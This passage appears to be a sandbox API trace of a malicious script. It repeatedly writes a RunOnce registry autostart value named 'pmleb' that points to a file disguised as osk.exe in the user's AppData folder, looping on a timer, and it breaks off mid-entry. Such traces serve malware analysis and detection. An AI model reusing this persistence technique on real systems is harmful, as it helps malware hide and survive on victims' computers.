ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.738] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.738] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.738] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.738] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.738] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.738] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) 
returned 54 [0080.739] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.739] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.739] RegCloseKey (hKey=0x280) returned 0x0 [0080.739] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.739] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.739] SetTimer (hWnd=0x20280, nIDEvent=0x208a, uElapse=0xa, lpTimerFunc=0x0) returned 0x208a [0080.739] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.751] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.751] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.751] KillTimer (hWnd=0x20280, uIDEvent=0x208a) returned 1 [0080.751] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.751] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.752] IUnknown:Release (This=0x787518) returned 0x1 [0080.752] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.752] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.752] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, 
pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.752] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.752] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.752] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.752] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.752] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 
| out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.752] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.752] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xf [0080.752] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.753] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x10 [0080.753] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.753] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xf [0080.753] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.754] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.754] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.754] 
IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.754] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.754] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.754] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.754] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.754] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 
[0080.754] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.754] RegCloseKey (hKey=0x280) returned 0x0 [0080.755] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.755] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.755] SetTimer (hWnd=0x20280, nIDEvent=0x208b, uElapse=0xa, lpTimerFunc=0x0) returned 0x208b [0080.755] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.767] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.767] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.767] KillTimer (hWnd=0x20280, uIDEvent=0x208b) returned 1 [0080.767] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.767] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.767] IUnknown:Release (This=0x787518) returned 0x1 [0080.767] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.767] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.767] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, 
cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.768] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.768] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.768] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.768] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.768] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.768] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.768] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x10 [0080.768] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.768] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x11 [0080.768] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.769] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x10 [0080.769] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.769] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.769] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.769] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.769] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.769] ITypeInfo:LocalInvoke (This=0x7a9740) 
returned 0x0 [0080.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.769] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.769] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.770] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.770] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 
| out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.770] RegCloseKey (hKey=0x280) returned 0x0 [0080.770] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.770] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.770] SetTimer (hWnd=0x20280, nIDEvent=0x208c, uElapse=0xa, lpTimerFunc=0x0) returned 0x208c [0080.770] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.782] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.782] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.783] KillTimer (hWnd=0x20280, uIDEvent=0x208c) returned 1 [0080.783] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.783] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.783] IUnknown:Release (This=0x787518) returned 0x1 [0080.783] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.783] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.783] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, 
wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.783] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.783] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.783] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.783] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.784] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.784] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 
[0080.784] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x11 [0080.784] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.784] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x12 [0080.784] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 